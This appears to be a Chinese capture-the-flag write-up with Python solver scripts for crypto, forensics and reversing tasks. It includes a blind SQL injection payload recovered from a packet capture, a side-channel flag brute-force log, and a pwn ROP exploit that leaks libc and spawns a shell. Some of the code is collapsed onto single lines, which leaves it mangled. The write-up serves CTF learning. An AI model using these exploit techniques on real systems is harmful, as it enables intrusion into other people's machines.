a='52112013243f2a0f280b22131e181f19412322101b192113260c0c29540d191e2b380d2b1f112017273c134f51121f133034191f191a560d10250b2521162312' b='' for i in range(0,len(a),4): b+=chr(int('0x'+a[i:i+2],16)+int('0x'+a[i+2:i+4],16)) print b
import sys from secret_file import * def_l(idx, s): return s[idx:] + s[:idx] defmain(p, k1, k2): s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}" t = [[_l((i+j) % len(s), s) for j in range(len(s))] for i in range(len(s))] i1 = 0 i2 = 0 c = "" for a in p: c += t[s.find(a)][s.find(k1[i1])][s.find(k2[i2])] i1 = (i1 + 1) % len(k1) i2 = (i2 + 1) % len(k2) return c
s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
def_l(idx, s): return s[idx:] + s[:idx]
defdecrypt(ct, k1, k2): s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}" t = [[_l((i + j) % len(s), s) for j in range(len(s))] for i in range(len(s))] i1 = 0 i2 = 0 decrypted = "" for a in ct: for c in s: if t[s.find(c)][s.find(k1[i1])][s.find(k2[i2])] == a: decrypted += c break i1 = (i1 + 1) % len(k1) i2 = (i2 + 1) % len(k2) return decrypted
defget_key(plain, cipher, key_len): s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}" t = [[_l((i + j) % len(s), s) for j in range(len(s))] for i in range(len(s))] i1 = 0 i2 = 0 key = ['*'] * key_len for i in range(len(plain)): for i1 in range(len(s)): for i2 in range(5): if t[s.find(plain[i])][s.find(s[i1])][s.find(s[i2])] == cipher[i]: key[i] = s[i1] key[key_len-1-i] = s[i2] return''.join(key)
f = open('8.pcapng','rb') res = open('res.txt','wb')
for i in f.readlines(): tmp = i re1 = re.findall(r'/\?id=1\'/\*\*/and/\*\*/(.*) HTTP/1.1',i) if len(re1) > 0: res.write(re1[0]+'|') if'Content-Length: 332'in i or'Content-Length: 366'in i: res.write(i) res.close()
res = open('res.txt','rb') flag = '' check = [32,126] for i in res.readlines(): # ascii(substring((select/**/keyid/**/from/**/flag/**/limit/**/0,1),1,1))%3C79%23|Content-Length: 332 tag = re.findall(r',(\d{,2}),1\)\)%3C(\d{,3})%23\|Content-Length: (\d{3})',i)[0] if tag[2] == '332': # False check[0] = int(tag[1]) else: check[1] = int(tag[1]) print check if check[1] - check[0] == 1: flag += chr(check[0]) check = [32,126] print'[!]',flag
#-*- coding:utf-8 -*- import os from base64 import b64encode # flag{ this is not flag, it's just a comment in python source file.I hide some secret with python, I don't think you can found it. secret_file_name = 'flag.txt' secret_file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), secret_file_name) secret = '' with open(secret_file_path, 'r') as f: secret = f.read() os.remove(secret_file_path) key = input("Set a value 0x00 < key < 0xff:") key = int(key[2:],16) defencrypt(content, key): result = '' for c in content: result += chr(ord(c) ^ key) return b64encode(result.encode('utf-8')) for i in range(3): secret = encrypt(secret, key) if type(secret) != 'str': secret = secret.decode('utf-8') result_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lalala.secret') with open(result_path, 'w') as f: f.write(secret) os.remove(os.path.abspath(__file__))
在\Device\HarddiskVolume1\Documents and Settings\Administrator\桌面找到加密后的文件lalala.secret,内存搜索一大串base64也可以,加密字符串特征比较明显。听说有大神找base64字符串,直接脑补了加密算法,我只能说刚刚NB。
直接爆破key即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
m = 'c1IufV1PRUZOX1VtTyYiIE9BRXJxeyZSWyRVc0MmIiJPQS52cU9FUkN6XXVyQlJ7c1JFQHJBI3xGeWNzcXtnL3QkZyNccCoq=='
defdecrypt(content, key): result = '' content = b64decode(content).decode('utf-8') for c in content: result += chr(ord(c) ^ key) return result
for i in range(0x100): try: m2 = decrypt(m,i) m3 = decrypt(m2,i) flag = decrypt(m3,i) print(flag) except: pass
for ( i = 1; i < len(flag); ++i ) { flag[i] ^= i; } return flag;
1 2 3
>>> a=[0x0,0x67,0x6e,0x62,0x63,0x7e,0x41,0x4b,0x3b,0x4c,0x7e,0x51,0x5c,0x49,0x62,0x77,0x78,0x62,0x79,0x51,0x79,0x70,0x75,0x2e,0x2e,0x70,0x48,0x66,0x1c] >>> ''.join([chr(a[i]^i) for i in range(len(a))]) '\x00flag{GL3EtZPDlxhskBmec96iR}\x00'
./pinCTF.py -f examples/wyvern_c85f1be480808a9da350faaa6104a19b -i -l obj-intel64/ -sl 28 -r abcdefghijklmnopqrstuvwxyz012345_-+LVMA -sk [+] iter 0 using d for dAAAAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 1 using r for drAAAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 2 using 4 for dr4AAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 3 using g for dr4gAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 4 using 0 for dr4g0AAAAAAAAAAAAAAAAAAAAAAA [+] iter 5 using n for dr4g0nAAAAAAAAAAAAAAAAAAAAAA [+] iter 6 using _ for dr4g0n_AAAAAAAAAAAAAAAAAAAAA [+] iter 7 using o for dr4g0n_oAAAAAAAAAAAAAAAAAAAA [+] iter 8 using r for dr4g0n_orAAAAAAAAAAAAAAAAAAA [+] iter 9 using _ for dr4g0n_or_AAAAAAAAAAAAAAAAAA [+] iter 10 using p for dr4g0n_or_pAAAAAAAAAAAAAAAAA [+] iter 11 using 4 for dr4g0n_or_p4AAAAAAAAAAAAAAAA [+] iter 12 using t for dr4g0n_or_p4tAAAAAAAAAAAAAAA [+] iter 13 using r for dr4g0n_or_p4trAAAAAAAAAAAAAA [+] iter 14 using i for dr4g0n_or_p4triAAAAAAAAAAAAA [+] iter 15 using c for dr4g0n_or_p4tricAAAAAAAAAAAA [+] iter 16 using 1 for dr4g0n_or_p4tric1AAAAAAAAAAA [+] iter 17 using a for dr4g0n_or_p4tric1aAAAAAAAAAA [+] iter 18 using n for dr4g0n_or_p4tric1anAAAAAAAAA [+] iter 19 using _ for dr4g0n_or_p4tric1an_AAAAAAAA [+] iter 20 using i for dr4g0n_or_p4tric1an_iAAAAAAA [+] iter 21 using t for dr4g0n_or_p4tric1an_itAAAAAA [+] iter 22 using 5 for dr4g0n_or_p4tric1an_it5AAAAA [+] iter 23 using _ for dr4g0n_or_p4tric1an_it5_AAAA [+] iter 24 using L for dr4g0n_or_p4tric1an_it5_LAAA [+] iter 25 using L for dr4g0n_or_p4tric1an_it5_LLAA [+] iter 26 using V for dr4g0n_or_p4tric1an_it5_LLVA [+] iter 27 using M for dr4g0n_or_p4tric1an_it5_LLVM [+] Found pattern dr4g0n_or_p4tric1an_it5_LLVM
pwn
pwn不难,没脑洞没坑
pwn 1
栈溢出后ROP即可
1 2 3 4 5 6
pr = 0x0000000000400863# pop rdi ; ret p.sendlineafter('name:','a'*0x78+flat(pr,elf.got['read'],elf.plt['puts'],0x400776)) libc.address = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['read'] success(hex(libc.address)) p.sendlineafter('name:','a'*0x78+p64(libc.address+0x4526a)) p.interactive()